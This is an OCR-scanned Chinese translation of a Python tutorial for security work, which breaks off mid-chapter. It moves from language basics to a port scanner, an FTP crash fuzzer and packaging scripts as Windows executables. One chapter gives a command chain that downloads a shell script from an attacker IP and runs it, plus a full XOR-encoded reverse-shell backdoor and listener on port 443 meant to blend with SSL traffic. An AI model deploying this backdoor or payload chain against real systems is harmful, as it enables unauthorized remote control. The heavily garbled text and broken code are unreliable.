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~# python 

>>> import urllib 

>>> from bs4 import BeautifulSoup 

>>> url = urllib.urlopen("http://www.primalsecurity.net") 
>>> output = BeautifulSoup(url.read(), 'lxml') 

>>> output.title 

<title>Primal Security Podcast</title> 

>>> 


这 是 一 套 python 系 列 教程 ， 学 习 本 套 教 程 不 需要 你 有 任何 编程 背景 。 教 程 由 最 简单 
的 hello world 到 信息 安全 应 用 实例 。 逐 个 难点 击破 : 


0x0 一 入门 

0x0 一 入 门 Pt.2 
0x1 一 端口 打 描 
0x2 - 反 向 shell 


Ox3 一 模糊 测试 

0x4 — Python 转 exe 
0x5 — Web 请 求 

0x6 — 爬虫 

0x7 - Web 扫 摘 和 利用 
0x8 — Whois 查 询 

0x9 — 系统 命令 调用 
OxA — Python 版 的 Metasploit 
OxB — 伪 终 端 

OxC 一 exp 编写 

用 例 1: CVE-2014-6271 
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用 例 2: CVE-2012-1823 
用 例 3: CVE-2012-3152 
用 例 4: CVE-2014-3704 
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这 将 是 第 一 个 一 系列 关于 python 编 程 的 博客 文章 。python 是 一 门 非常 强大 的 语言 ， 
因为 它 有 信息 安全 社区 的 支撑 。 这 意味 着 很 多 工具 都 是 由 python 编 写 并 且 可 以 在 脚 
本 中 调用 很 多 模块 。 使 用 模块 的 好 你 就 是 只 需要 少量 的 代码 就 能 够 完成 所 需 的 任 
务 。 


这 篇 文章 假定 你 的 系统 是 Linux，python 版 本 是 2.*。 在 写 代 码 的 时 候 你 也 可 以 直接 
的 写 在 解释 器 里 面 (linux 里 面 输 入 python 即 可 进入 )， 也 可 以 把 代码 放 到 一 个 文件 里 
面 。 很 多 人 会 发 现 把 代码 存放 到 文件 里 面 要 比 直 接 写 在 解释 器 上 面 要 好 很 多 。 值 得 
注意 的 是 python 中 强制 缩 进 。 大 家 在 写 函 数 声明 ， 循 环 ，ifelse 语 句 等 等 的 时 候 就 
会 发 现 。 


python 解 释 器 

在 终端 里 面 输入 python: 
-$ python 
Python 2.7.6 (default, Mar 22 2014, 22:59:56) 
[GCC 4.8.2] on linux2 


Type "help", "copyright", "credits" or "license" for more informat: 
>>> 


E —S 


输入 之 后 你 就 可 以 直接 在 解释 器 里 面 写 你 的 代码 了 。 下 面 我 们 将 声明 两 个 变量 ， 并 
且 使 用 type() 函 数 查 看 变量 的 类 型 。 假 设 我 们 声明 了 一 个 字符 串 和 整 型 : 





>>> 
>>> ip = '8.8.8.8' 
>>> port = 53 

>>> 

>>> type(ip) 

<type 'str'> 

>>> 

>>> type(port) 
<type 'int'> 

>>> 


你 可 以 使 用 内 置 的 help() 沙 数 去 了 解 一 个 汞 数 的 详细 。 记 住 这 一 点 ， 它 可 以 帮助 你 
在 学 习 语言 的 时 候 学 习 到 更 多 的 详细 内 容 . 


>>> 


>>> help(type) 
>>> 


有 时 你 会 想 把 一 些 变量 和 字符 串 连 接 起 来 然后 通过 脚本 显示 出 来 。 那 么 你 就 需要 使 
用 str() 函 数 把 整 型 转换 成 字符 串 类 型 


>>> Ip 1.1:1.-1' 

>>> port=55 

>>> print 'the ip is:'+ip+'and the port is:'+str(port) 
the ip is:1.1.1.1and the port is:55 


前 面 声 明 变 量 的 时 候 "IP" 就 是 一 个 字符 串 就 不 需要 转换 ， 而 "port" 就 需要 。 现 在 你 就 
已 经 知道 了 两 个 基本 的 数据 类 型 (string 和 integer)。 现 在 你 可 以 试 试 使 用 内 置 函 数 与 
这 两 个 数据 类 型 写 出 其 他 的 代码 。 


Python 字符 串 允 许 你 通过 偏 移 值 来 获取 你 想 需 要 的 字符 串 , 并 且 可 以 通过 len() 函 数 来 
获取 字符 串 的 长 度 ， 它 可 以 帮助 你 更 方便 的 操作 字符 串 。 


>>> 
>>> domain='primalsecurity.net' 
>>> domain 

'primalsecurity.net' 

>>> domain[0] 

'p' 

>>> domain[0:3] 

'pri' 

>>> domain[1:] 
'rimalsecurity.net' 


>>> len(domain) 
18 
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>>> dir(ip) 
(add), Class s contas.) delabtere s, docs 
A d 


现在 你 可 以 使 用 上 面 列 举 出 来 的 内 建 字符 串 函 数 ， 如 果 想 知道 这 个 函数 的 更 多 描述 
可 以 参考 前 面 提 到 的 help() 范 数 : 











>>> 
>>> help(ip.split) 

>>> 

>>> string = ip+':'+str(port) 
>>> string 

“88 858.53 

>>> 

>>> string.split(':') 

[8-8 5096 5S ] 


split AE — 4 e RT Riad" "WHE X PRÉ PERS MENE RARE RN 
串 函 数 因为 你 能 够 把 这 个 字符 串 里 面 的 有 用 信息 提出 出 来 。 例 如 ， 你 获取 到 了 一 个 
ip 列表 ， 你 想 在 这 个 列表 里 面 添加 一 个 索引 值 。 你 也 可 以 删除 和 添加 新 的 值 到 这 个 
列表 里 面 通过 .append() 和 .remove() 函 数 


>>> 

>>> list = string.split(':') 
>>> 

>>> list 

[8 B poH '53'] 

>>> 

>>> list[0] 

'8.8.8.8' 

>>> 

>>> list.append('google') 
>>> list 

['8.8.8.8', '53', 'google'] 
>>> list.remove('google') 
>>> list 

['8.8.8.8', '53'] 

>>> 


Python 模块 


在 上 面 提 到 过 ，Python 模 块 能 够 让 你 用 少量 的 代码 就 能 够 完成 你 的 任务 ,Python 有 
许多 有 用 的 内 建 模块 (os,subprocess,socket,urllib,httplib,re,sys 等 等 ) 和 第 三 方 模块 
(cymruwhois,scapy,dpkt,spider 等 等 ). 使 用 Python 模块 很 简单 "import ". OS 模块 是 非 
常 重要 的 因为 你 需要 在 你 的 Python 代码 里 面 调用 系统 命令 : 


>>> 
>>> import os 

>>> 

>>> dir(os) 

['EX_CANTCREAT', 'EX_CONFIG', 'EX_DATAERR', 'EX_IOERR', 'EX_NOHOST 
>>> 


EN 





你 可 以 看 到 上 面 os 模 块 给 你 提供 了 很 多 可 以 使 用 的 功能 函数 ， 其 中 我 发 现 我 经 常 使 
用 "os.system"， 我 可 给 它 传递 一 个 命 分， 然后 通过 它 去 在 系统 底层 执行 我 们 传递 的 
命令 .下 面 我 们 将 会 执行 一 个 命令 "echo 'UHJpbWFsIFNIY3VyaXR5Cg==' | base64 
-d 


>>> 
>>> os.system("echo 'UHJpbWFsIFN1Y3VyaXR5Cg==' | base64 -d") 
Primal Security 

>>> 


创建 一 个 文件 对 象 


现在 我 们 将 演示 一 些 例子 ,如 何在 Python 里 面 从 一 个 文件 里 面 读 取 数 据 和 创建 一 个 文 
件 。 下 面 的 这 个 例子 演示 了 如 何 创建 一 个 文件 对 象 ， 并 且 读 取 / 写 入 数据 到 这 个 对 象 
里 面 ， 通 常 你 自己 读 取 一 个 文件 的 数据 ， 并 且 做 一 些 逻 辑 处 理 然后 把 输出 的 写 到 文 
件 里 面 : 


>>> 
>>> file = open('test.txt', 'w') 
>>> file.write('Hello World') 
>>> file.close() 

>>> file = open('test.txt', 'r') 
>>> file.readlines() 

['Hello World'] 

>>> 


在 Python 解释 器 里 面 练习 上 面 的 内 容 并 且 多 加 巩固 ， 因 为 这 些 内 容 在 后 面 的 章节 里 
面 会 经 常 使 用 ， 当 我 写 代 码 的 时 候 ， 我 喜欢 打开 两 个 终端 ， 一 个 用 于 执行 python 解 
释 器 ， 还 有 一 个 用 来 把 远 辑 写 入 到 脚本 里 面 。 下 一 章 将 会 写 一 个 真实 的 Python 脚 

本 ， 声明 定义 ， 类 和 sys 模 块 。 


入 门 (2) 

这 一 章 将 继续 讲解 一 些 基础 的 Python 脚 本 概念 ,我 们 将 把 代码 写 入 到 一 个 脚本 里 面 ， 
FAX, X flsys tk 

Python 脚本 框架 

下 面 是 一 个 开始 写 Python 脚 本 的 基础 例子 ， 开 始 部 分 ， 我 么 告诉 系统 需要 使 用 那 一 


2 行 代码 有 mian() 的 先 执行 。 你 可 以 定义 在 你 的 脚本 里 面 定 义 其 它 函 数 ， 这 样 使 得 你 
的 代码 更 容易 的 理解 和 修改 维护 : 


#!/usr/bin/python 
import <module1>, <module2> 


def myFunction(): 


def main(): 

myFunction( ) 
if name --" main _": 
main() 





KA 


HE LISTE ZEE RET IRENE, dif ERFA ARER FH 
的 这 个 伪 代 码 演 示 的 例子 就 能 够 很 清晰 的 解释 这 个 概念 : 


# PSBHERSAAU GE dA 

def MyFunction: 
...do work... 
return output 


#Emain 2I Eg mia: 
def main(): 
output - MyFunction(input) 
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Python 类 开始 使 用 的 时 候 会 有 点 困难 ， 因 为 它 是 教 你 以 何 种 方式 设计 你 的 代码 ， 如 
果 你 掌握 类 的 概念 那么 你 就 可 以 把 数据 和 定义 按照 类 的 逻辑 分 组 ， 这 样 类 就 拥有 了 
属性 和 与 之 想 关联 的 方法 。 当 你 定义 一 个 类 之 后 ， 你 可 以 创建 一 个 新 的 类 ， 然 后 继 
承 之 前 创建 的 类 的 属性 和 与 之 相关 联 的 方法 ， 这 编程 就 叫做 面向 对 象 编程 。 

如 果 你 感到 迷惑 ， 那 么 我 建议 你 先 不 要 去 学 习 类 ， 实 际 上 ， 你 并 不 需要 类 。 但 它 可 
以 让 你 的 代码 减少 元 余 。 下 面 我 们 将 定义 个 新 的 类 "Domain" 使 用 "class" 关 键 字 ， 当 
你 实例 化 Domain 类 型 对 象 的 时 候 ， 它 的 类 型 有 多 种 方式 去 定义 : 


>>> import os 
>>> class Domain: 
E def _ init (self, domain, port, 
# 通 过 两 个 内 部 变量 存储 变量 
oe self .domain=domain 
self .port=port 
ee self .protocol=protocol 
# 构 造 一 个 ur1 的 方法 
def URL(self): 
if self.protocol -- 'https': 
URL = 'https://'+self.domain+':'+self.port+'/' 
if self.protocol == 'http': 
URL = 'http://'+self.domain+':'+self.port+'/' 
AE return URL 
# 调用 os ,system 中 主机 命令 Lookup 去 解析 域名 
要 def lookup(self): 
os.system("host "+self.domain) 


protocol): 


>>> 
>>> 
>>> 
>>> dir(domain) 
UR oC ee as 
>>> domain.URL() 
'https://8.8.8.8:443/' 
>>> domain.ip 
'8.8.8.8' 
>>> domain. 
'443' 

>>> domain. 
'https' 


domain-Domain('google.com', '443', 'https') 


module ', 'ip', 'lookup', 


"port 





port 


protocol 


>>> domain. 
google.com 
google.com 
google.com 


lookup() 

has address 
has address 
has address 


74.125.220.233 
74,125.228.227 
v4 125.229.232 


A —————————————Á("!: 


正如 你 所 看 到 的 ， 当 你 实例 化 一 个 Domian 类 之 后 你 可 以 运行 类 中 的 方法 。 再 次 说 
声 ， 这 个 概念 最 初 的 时 候 很 容易 混乱 ， 尤 其 是 当 你 刚刚 Python 和 编程 的 时 候 。 尝 试 
一 下 去 实现 一 个 新 的 类 在 你 的 Python 脚本 里 面 ， 我 发 现 这 是 掌握 这 个 概念 最 好 的 途 


径 。 
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最 好 我 们 来 介绍 一 下 sys 模 块 ， 它 可 以 让 你 读 取 从 命令 终端 输入 的 值 并 且 帮 你 引信 
到 脚本 里 面 ， 它 的 语法 很 简单 ，sys.agrv[0] 就 是 一 个 实际 的 脚本 名 ， 并 在 命令 行 指 
定 的 每 个 参数 后 面 分 配 一 个 下 标 。 下 面 是 一 个 简单 的 例子 : 





#!/usr/bin/python 
import sys 


script = sys.argv[0] 
ip = sys.argv[1] 
port = sys.argv[2] 


print "[+] The script name is: "+script 
print "[+] The IP is: "+ip+" and the port is: "+port 


当 执行 这 个 脚本 的 时 候 ， 并 且 后 面 跟 三 个 参数 执行 之 后 的 结果 如 下 : 


-$ python sys.py 8.8.8.8 53 
[+] The script name is: sys.py 
[*] The IP is: 8.8.8.8 and the port is: 53 


上 面 的 只 是 一 个 例子 ， 大 家 可 以 继续 REWISLEUEP ython 模 块 ， 因 为 它们 能 够 放 你 用 
最 简单 的 方式 解决 你 遇 到 的 问题 。 下 一 章 将 会 介 3 使 用 Python 进 砷 行 网 络 连接 并 且 写 
出 一 个 基础 的 扫描 器 . 
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这 一 章 将 会 演示 如 何 通过 Python 的 网 络 连接 来 开发 一 个 基础 的 端口 扫描 器 ,我 们 的 设 
计 思 路 是 使 用 socket 一 通 又 一 通 的 去 连接 ip 与 端口 的 组 合 的 新 值 ,为 了 方面 我 们 能 够 
快速 的 完成 它 ， 首 先 需要 介绍 一 点 新 的 概念 ,for 循 环 : 


>>> 
>>> for port in range(1000,1024): 
print "[+] The port is: "+str(port) 


[+] The port is: 1000 
[+] The port is: 1001 
[+] The port is: 1002 
[+] The port is: 1003 
[+] The port is: 1004 
[+] The port is: 1005 
[+] The port is: 1006 
[+] The port is: 1007 
[+] The port is: 1008 
[+] The port is: 1009 
[+] The port is: 1010 
[+] The port is: 1011 
[+] The port is: 1012 
[+] The port is: 1013 
[+] The port is: 1014 
[+] The port is: 1015 
[+] The port is: 1016 
[+] The port is: 1017 
[+] The port is: 1018 
[+] The port is: 1019 
[+] The port is: 1020 
[+] The port is: 1021 
[+] The port is: 1022 
[+] The port is: 1023 


注意 上 面 那 段 代 码 在 循环 体内 的 缩 进 ， 通 常情 况 下 是 空 两 格 或 一 个 tab 键 ， 但 这 都 没 
有 关系 ， 只 要 你 的 整个 代码 一 直 就 可 以 了 。 我 么 所 写 的 那个 简短 的 端口 扫描 器 的 核 
心 代码 会 写 在 上 面 代码 中 的 输出 块 部 分 ， 然 后 建立 一 个 socket 连 接 。 下 面 的 代码 就 
演示 了 如 何 使 用 内 建 的 socket 模 块 去 建立 一 个 socket 连 接 : 


>>> 


>>> import socket 

>>> 

>>> s = socket.socket() 

>>> s.connect(('127.0.0.1s', 22)) 
>>> s.send('Primal Security \n') 
17 

>>> banner = s.recv(1024) 

>>> print banner 

OpenSSH 


上 面 这 个 例子 : dX417cimportix socket} 3f B49 FHconnect()PR 24 5 iE HEHE XE BIP 
地 址 与 端口 。 它 就 会 建立 一 个 TCP 连 接 (SYN/SYN-ACK/ACK) 并 且 我 们 再 通过 
send() 画 数 给 服务 器 发 送 一 个 真实 的 数据 ， 然 后 使 用 recv() 打 印 出 响应 的 内 容 。 现 在 
教 大 家 如 何 容 错 socket， 对 于 不 能 打开 的 连接 : 


>>> 
>>> s.connect(('127.0.0.1', 23)) 
Traceback (most recent call last): 

File "<stdin>", line 1, in ? 

File "<string>", line 1, in connect 
socket.error: (111, 'Connection refused') 


对 于 上 面 的 错误 有 若干 中 义理 方式 ， 这 里 我 们 使 用 最 简单 的 一 种 方式 : 使 
用 "try/except" 循 环 来 处理 错误 : 


>>> 
>>> try: 
s.connect(('127.0.0.1', 23)) 
. except: pass 


>>> 


现在 就 不 会 出 现 错误 了 民 简 单 的 代码 就 让 你 的 程序 能 够 继续 工作 下 去 ^_^。 
ER BEM 使 用 for 循 环 来 写 一 个 简单 的 端口 扫描 器 : 


>>> 
>>> for port in range(20, 25): 
try: 
print "[+] Attempting to connect to 127.0.0.1:"+str(port) 
s.connect(('127.0.0.1', port)) 
s.send('Primal Security \n') 
banner = s.recv(1024) 
if banner: 
print "[+] Port "+str(port)+" open: "+banner 
s.close() 
except: pass 
17 
[*] Attempting to connect to 127.0.0.1:20 
[*] Attempting to connect to 127.0.0. 
[*] Attempting to connect to 127.0.0.1:22 
[*] Port 22 open: OpenSSH 
[*] Attempting to connect to 127.0.0.1:23 
[+] Attempting to connect to 127.0.0. 
[+] Attempting to connect to 127.0.0.1:25 
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误 ， 同 时 上 面 还 演示 了 如 何 使 用 "并 语 句 打 印 出 可 以 连接 成 功 的 端口 。 下 面 我 们 将 创 
建 一 个 我 们 扫描 指定 端口 的 扫描 器 ， 这 里 的 端口 号 ， 我 们 使 用 数组 来 存储 ， 然 后 通 
历 这 一 个 数组 : 


>>> 
>>> ports = [22, 445, 80, 443, 3389] 
>>> for port in ports: 

print port 


如 果 我 们 想 一 次 性 打 描 多 台 主 机 ， 可 以 使 用 一 个 for 循 环 敬 套 。 最 外 层 的 是 主机 的 
ip， 然 后 里 面 的 for 循 环 是 端口 。 下 面 有 一 个 基础 的 例子 ， 展 示 了 如 何 通过 循环 找 套 
来 构建 一 个 简单 的 扫描 器 : 


>>> 
ps» hostes tb27590:0:1 | SIOZ 5168 /15 1020. Odo] 
>>> 
>>> ports = [22, 445, 80, 443, 3389] 
>>> 
>>> for host in hosts: 
for port in ports: 
try: 
print "[+] Connecting to "+host+":"+str(port) 
s.connect((host, port)) 
s.send('Primal Security \n') 
banner - s.recv(1024) 
if banner: 
print "[+] Port "+str(port)+" open: "+banner 
s.close() 
except:pass 


[+] Connecting to 127.0.0. 
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[+] Port 22 open: OpenSSH 
[+] Connecting to 127.0.0.1:445 
[+] Connecting to 127.0.0.1:80 
[+] Connecting to 127.0.0.1:443 
[+] Connecting to 127.0.0.1:3389 
[+] Connecting to 192.168.1.5:22 
[+] Connecting to 192.168.1.5:445 
[+] Connecting to 192.168.1.5:80 
[+] Connecting to 192.168.1.5:443 
[+] Connecting to 192.168.1.5:3389 
[+] Connecting to 10.0.0.1:22 
[+] Connecting to 10.0.0.1:445 
[+] Connecting to 10.0.0.1:80 
[+] Connecting to 10.0.0.1:443 
[+] Connecting to 10.0.0.1:3389 
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hosts[0] 扫 描 完 成 之 后 再 扫 摘 hosts[1] 依 次 类 推 。 在 这 个 例子 里 面 你 也 可 以 修改 里 面 
的 代码 ， 只 让 它 显 示 出 可 以 打开 的 端口 。 


在 这 最 后 ， 你 会 发 现 还 是 Nmap 最 好 用 ， 但 是 我 们 将 在 后 面 的 文章 里 面 继续 完善 
个 实例 ， 大 家 可 以 花 am CLE NIS {他 的 功能 函数 ， 大 家 可 上 T 
FA"dir(socket)"3K f RBS, Mix B'help()'. 


Ix [shell 


这 篇 教程 将 会 教 你 使 用 Python 编写 一 个 反 向 shell， 首 先 我 们 先 演示 使 用 Python 如 何 
利用 web 服 务 器 的 功能 ， 把 文件 从 另 一 台 主 机 传送 过 来 。 我 们 假设 你 有 一 台 贫 偶 主 
机 ， 你 现在 想 下 载 便 偶 机 上 面 的 的 文件 。 那 么 你 就 可 以 使 用 shell( 或 meterpreten) 去 
访问 这 台 仙 偶 机 ， 你 可 以 通过 一 行 Python 代码 把 伯 偶 机 建立 成 为 一 个 web 服 务 器 ， 
AN IAA. 
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数 "SimpleHTTPServenr" 来 创建 ， 你 可 以 使 用 '-m' 参 数 直接 在 命令 行 调用 模块 ， 创 建 
的 服务 器 默认 是 监听 的 8000 端 口 ， 但 是 你 可 以 指定 端口 ， 直 接 

在 'SimpleHTTPServer 后 面 跟 一 个 端口 参数 : 


python -m SimpleHTTPServer 80 
Serving HTTP on 0.0.0.0 80 ... 


我 们 假设 你 没有 防火 墙 去 阻止 你 的 连接 ， 那 么 你 是 可 以 请 求 到 这 服务 器 的 数据 。 你 
可 以 在 任何 目录 里 面 去 启动 Python HTTP 服务器， 这 样 你 就 能 够 通过 浏览 器 或 者 是 
远程 客户 端 来 访问 这 个 目录 。 这 里 有 一 个 简单 的 例子 告诉 你 使 用 wget 工 具 去 获取 文 
件 ,但 是 有 些 时 候 就 会 经 常 发 现 你 根本 没有 权限 在 当前 目录 写 入 文件 并 且 初 始 化 这 个 
脚本 ， 但 是 你 可 以 改变 脚本 执行 的 目录 ， 下 面 这 个 例子 就 演示 了 把 脚本 在 /tmp 目 录 
下 面 执行 : 


# 使 用 -0 参数 ， 把 文件 保存 在 其 他 目录 - /tmp/ 一 般 可 写 
wget -0 /tmp/shell.py http://«attacker ip»/shell.py 


# 修 改 权限 
chmod a+x /tmp/shell.py 


# 使 用 file 命 令 检 查 文件 是 否 正 确 
file /tmp/shell.py 


# 执 行 脚本 
/usr/bin/python /tmp/shell.py 


现在 让 我 看 一 个 实际 的 后 门 代码 。 我 们 将 会 使 用 socket，subprocess 和 sys 模 块 ， 
我 非常 的 喜欢 subprocess 模 块 因为 它 人 允许 你 能 储存 STDOUT 给 一 个 变量 ， 然 后 在 脚 
本 中 的 其 他 地 方 使 用 ， 然 后 新 增 一 个 传输 层 ， 通 过 443 端 口 来 传输 文件 ， 这 个 端口 
经 常用 在 传输 ss| 的 数据 可 以 很 容易 的 混淆 数据 : 


#!/usr/bin/python 
import socket, Subprocess, sys 


RHOST = sys.argv[1] 

RPORT - A443 

S = socket.socket(socket.AF INET, socket.SOCK STREAM) 
s.connect((RHOST, RPORT)) 


while True: 
# 从 socket 中 接收 XOR 编 码 的 数据 
data = s.recv(1024) 


# XOR the data again with a '\x41' to get back to normal data 
en_data = bytearray(data) 
for i in range(len(en data)): 

en data[i] ^-0x41 


# HAT D, subprocesste3k Ae ISIN PIPE STDOUT/STDERR/STDINIB 1) 
comm = subprocess.Popen(str(en data), shell=True, stdout=subp) 
STDOUT, STDERR = comm.communicate( ) 


# 输出 编码 后 的 数据 并 且 发 送 给 指定 的 主机 RHOST 
en STDOUT = bytearray(STDOUT) 
for i in range(len(en STDOUT)): 
en STDOUT[i] ^-0x41 
s.send(en STDOUT) 
s.close() 
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上 面 的 代码 中 有 些 概念 已 经 在 0x1 中 介绍 过 了 ， 但 是 除了 之 前 的 使 用 socket 创 建 一 

个 连接 之 外 ， 我 们 通过 subprocess 模 块 执行 了 一 个 命 爷 ，subprocess 模 块 非常 的 方 
便 ， 它 允许 你 通过 STDOUT/STDERR 命 合 直 接 把 值 赋值 给 一 个 变量 ， 然 后 我 们 可 

以 通过 命 命 把 输出 的 进行 编码 然后 通过 socket 网 络 发 送出 去 。 使 用 OXR 的 好 处 就 是 
你 能 够 很 容易 编码 你 要 发 送 过 去 的 数据 ， 然 后 通过 相同 的 密 钥 来 解码 返回 的 数据 ， 

最 后 解码 后 的 数据 可 以 以 明文 的 形式 去 执行 命令 。 


现在 为 了 利用 好 这 个 后 门 ， 我 们 需要 一 个 监听 脚本 并 且 解 码 后 端 传输 过 来 的 数据 ， 

让 我 们 通过 明文 很 清晰 的 看 清楚 返回 的 数据 。 下 面 我 们 将 要 设计 一 个 监听 器 。 来 获 
取 反 向 shell 的 数据 ， 并 且 能 够 对 于 输入 二 输出 的 进行 解码 /编码 ， 为 了 能 够 在 终端 上 
面 能 够 很 清晰 的 看 出 来 ， 所 以 需要 使 用 XOR 编 码 : 





import socket 


S- socket.socket(socket.AF INET, socket.SOCK STREAM) 
s.bind(("0.0.0.0", 443)) 

s.listen(2) 

print "Listening on port 443... " 

(client, (ip, port)) - s.accept() 

print " Received connection from : ", ip 


while True: 

command = raw input('-$ ') 

encode - bytearray(command) 

for i in range(len(encode)): 
encode[i] ^-0x41 

client.send(encode) 

en data-client.recv(2048) 

decode - bytearray(en data) 

for i in range(len(decode)): 
decode[i] ^-0x41 

print decode 


client.close() 
s.close() 


这 章 的 例子 非常 有 趣 ， 对 于 学 习 信息 安全 的 朋友 都 喜欢 shell， 大 家 可 以 对 代码 做 点 
修改 让 这 个 脚本 也 能 够 在 window 上 面 也 能 够 正常 运行 ， 最 后 大 家 可 以 使 用 base64 
来 代替 XOR 进 行 编码 与 解码 ， 这 些 练习 有 助 于 你 更 加 灵活 的 使 用 python. 


模糊 测试 


这 一 章 将 会 演示 教 你 如 何 写 一 个 属于 自己 的 模糊 测试 脚本 ， 当 我 们 进行 exploit 研 究 
和 开发 的 时 候 就 可 以 使 用 脚本 语言 发 送 大 量 的 测试 数据 给 受害 者 机 器 ， 但 是 这 个 错 
误 数 据 数 据 很 容易 引发 应 用 程序 崩溃 掉 。 而 Python 却 不 同 ， 当 程序 骨 溃 你 与 程序 断 
开 连 接 了 ，Python 脚 本 会 马上 建立 一 个 新 的 连接 去 继续 测试 。 


下 面 我 们 首先 要 解决 的 问题 是 应 用 程序 如 何人 处 理 用 户 输 入 的 内 容 ， 因 为 在 进行 模糊 
测试 的 时 候 ， 我 们 会 不 定时 的 想到 一 些 新 的 思路 然后 把 数据 发 送 给 受害 者 机 器 上 面 
来 测试 ， 这 基本 思路 就 是 先 与 服务 器 建立 连接 ,然后 发 送 测 试 数据 给 服务 器 ， 通 过 
while 循 环 语句 来 判断 是 否 成 功 ， 即 使 出 现 错误 也 会 处 理 掉 : 


下 面 是 我 们 的 一 个 扫描 器 的 伪 代 三 : 


# 导 入 socket, sys 模 块 ， 如 果 是 web 服 务 那 么 还 需要 导入 httplib, urllib fikk 
<import modules> 


# 设 置 ip/ 端 口 

# 调 用 脚本 : ./script.py <RHOST> <RPORT> 
RHOST sys.argv[1] 

RPORT sys.argv[2] 


# 定 义 你 的 测试 数据 , 并 且 设 置 测试 数据 范围 值 
buffer = '\x41'*50 


# 使 用 循环 来 连接 服务 并 且 发 送 测试 数据 
while True: 
try: 
# 发 送 测试 数据 
# 直到 递增 到 50 
buffer = buffer + '\x41'*50 
except: 
print "Buffer Length: "+len(buffer ) 
print "Can't connect to service...check debugger for potential 





上 面 这 个 脚本 框架 能 够 适用 于 各 种 服务 ， 你 可 以 根据 你 的 服务 
(https,http,mysdqlsshd) 编 写 特 定 模糊 测试 脚本 .下 面 我 们 演示 一 个 基于 "USER" 命 倒 
的 ftp 服 务 器 模糊 测试 脚本 : 
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import sys, socket 
from time import sleep 


# 声 明 第 一 个 变量 target 用 来 接收 从 命令 端 输入 的 第 一 个 值 
target = sys.argv[1] 

# 创 建 50 个 A 的 字符 串 'Nx41' 

buff = '\x41'*50 


# 使 用 循环 来 递增 至 声明 buff 变 量 的 长 度 50 
while True: 
# 使 用 "try - except" 处 理 错 误 与 动作 
try: 
# 4X AMEN tpimMO 21 
s-socket.socket(socket.AF INET,socket.SOCK STREAM) 
s.settimeout(2) 
s.connect((target, 21) ) 
s.recv(1024) 


print "Sending buffer with length: "+str(len(buff)) 
# 发 送 字符 串 :USER 并 且 带 有 测试 的 用 户 名 

s.send("USER "+buff+"\r\n") 

s.close() 

sleep(1) 

# 使 用 循环 来 递增 直至 长 度 为 50 

buff = buff + '\x41'*50 


except: # 如 果 连 接 服务 器 失败 ， 我 们 就 打印 出 下 面 的 结果 


print "[+] Crash occured with buffer length: "+str(len(buff)-5( 


sys.exit() 
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上 面 这 段 代码 演示 了 一 个 基本 的 模糊 测试 脚本 ， 但 是 值得 注意 的 是 你 的 脚本 发 





送 \x41' 可 能 不 能 让 你 成 功 的 拿 下 受害 主机 ， 但 是 你 可 以 尝试 组 合 一 些 其 他 的 字符 
(用 户 词典 ). 还 有 一 个 更 加 高 级 的 模糊 测试 工具 Spike 和 具体 介绍 与 演示 , 它 可 以 一 次 
性 的 测试 更 多 的 数据 ， 并 且 让 你 能 够 攻击 成 功 .最 好 布置 一 个 练习 :大 家 可 以 把 上 面 


的 ftp 测 试 换 成 http 测 试 ， 这 里 提示 :你 可 能 需要 使 用 httplib/urllib. 


Pythonzzexe 


使 用 Pylnstaller 生 成 可 以 执行 程序 


一 章 是 教 大 家 如 何 把 自己 的 python 脚 本 编译 成 windows 下 可 执行 文件 ， 它 可 以 让 
你 的 python 脚 本 跨 平 台 去 运行 ， 并 且 不 需要 去 安装 python 解 释 器 。 首 先 我 们 需要 下 
载 依赖 包 ,cygwin( 或 者 其 他 的 工具 也 可 以 ， 这 里 我 们 使 用 Pywin). 


Linux: sudo apt-get install python2.7 build-essential python-dev zlib1g-dev upx 
Windows: http://www.activestate.com/activepython (fully packaged installer file) 


安装 Pywin32, Setuptools, PyInstaller 
安装 完成 之 后 
下 一 步 我 们 就 运行 python 命 合生 成 可 执行 文件 : 


python pyinstaller.py -onefile <scriptName> 


执行 上 面 的 命令 之 后 ， 导 入 依赖 文件 并 且 生 成 一 个 新 的 文件 ， 这 个 文件 里 面包 含 了 
三 个 文件 .txt,.spec 和 .exe 文 件 ， 其 中 .txt 与 .spec 可 以 删除 掉 ， 而 .exe 的 文件 就 是 你 
需要 的 执行 程序 . 


完整 的 封装 执行 程序 


Python 脚本 现在 已 经 被 编译 成 了 windows PE 文件 ， 并 且 不 需要 Python 解释 器 就 能 
够 在 windows 下 面 独立 运行 ， 这 可 以 让 你 更 轻松 的 把 脚本 迁移 到 windows 上 面 而 且 
不 用 担心 依赖 包 缺 失 的 问题 . 


一 个 简单 的 脚本 : 
#!/usr/bin/python 
import os 


os.system("echo Hello World!") 


现在 我 们 把 上 面 这 个 脚本 编译 成 为 一 个 可 以 执行 的 文件 : 


c:\PathToPython\python.exe pyinstaller.py --onefile helloWorld.py 


> helloworld.exe 
Hello World! 
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如 果 你 想 更 详细 的 了 解 这 个 过 程 ， 可 以 参考 BACK TO THE SOURCE CODE - 
Forward/Reverse Engineering Python Malware 


把 你 的 python 脚 本 编译 成 一 个 可 以 在 windows 上 面 可 以 执行 的 可 执行 程序 是 很 有 用 
的 ， 因 为 它 不 需要 你 安装 python 解 释 器 还 有 依赖 包 


大 家 可 以 尝试 一 下 0x2 中 的 例子 ， 把 那个 脚本 编译 成 可 执行 程序 。 


Web 请 求 


这 篇 文章 将 会 演示 如 何 使 用 python 进 行 web 请 求 ， 这 里 需要 几 个 python 的 模块 来 使 
得 我 们 能 够 更 容易 创建 和 解析 web 请 求 与 响应 (httplib,Mechanize,Beautiful Soup 和 
urllib/urllib2), 安 装 这 些 模 块 并 且 检 查 这 些 功 能 函数 . 


创建 一 个 Web 请 求 


Ek p — . 
下 面 有 个 简短 的 例子 ， 展 示 了 使 用 python 的 SimpleHTTPServer 创 建 一 个 本 地 web 
n Y NECEM " x. 
服务 器 ， 并 且 建 立 一 个 请 求 : 
TYP p Opy? tg n 0 0 O 0 OT Mat LOI. 
>>> root@cell:/var/www# python -m SimpleHTTPServer 80 
>>> import urllib Serving HTTP on 0.0.0.0 port 80 ... 
>>> url = 'http://127.0.0.1/' localhost - - [03/Mar/2014 16:01:41] "GET / HTTP/1.0" 200 - 
>>> request = urllib.urlopen(url) localhost - - [03/Mar/2014 16:07:07] "GET / HTTP/1.0" 200 - 
response = request.readlines() 
print response 
L'<html><body><h1>1t works!</hi>\n', ‘<p>This is the default web page for this s 
erver.</p>\n', ‘<p>The web server software is running but no content has been ad 
ded, yet.</p>\n', '</body></html>\n'] 
>>> dir(request) 
[dep ct ae Le pen. Tele. (Come. | 
fileno', 'fp', 'getcode', 'geturl', 'headers', 'info', 'next', 'read', ‘readline 
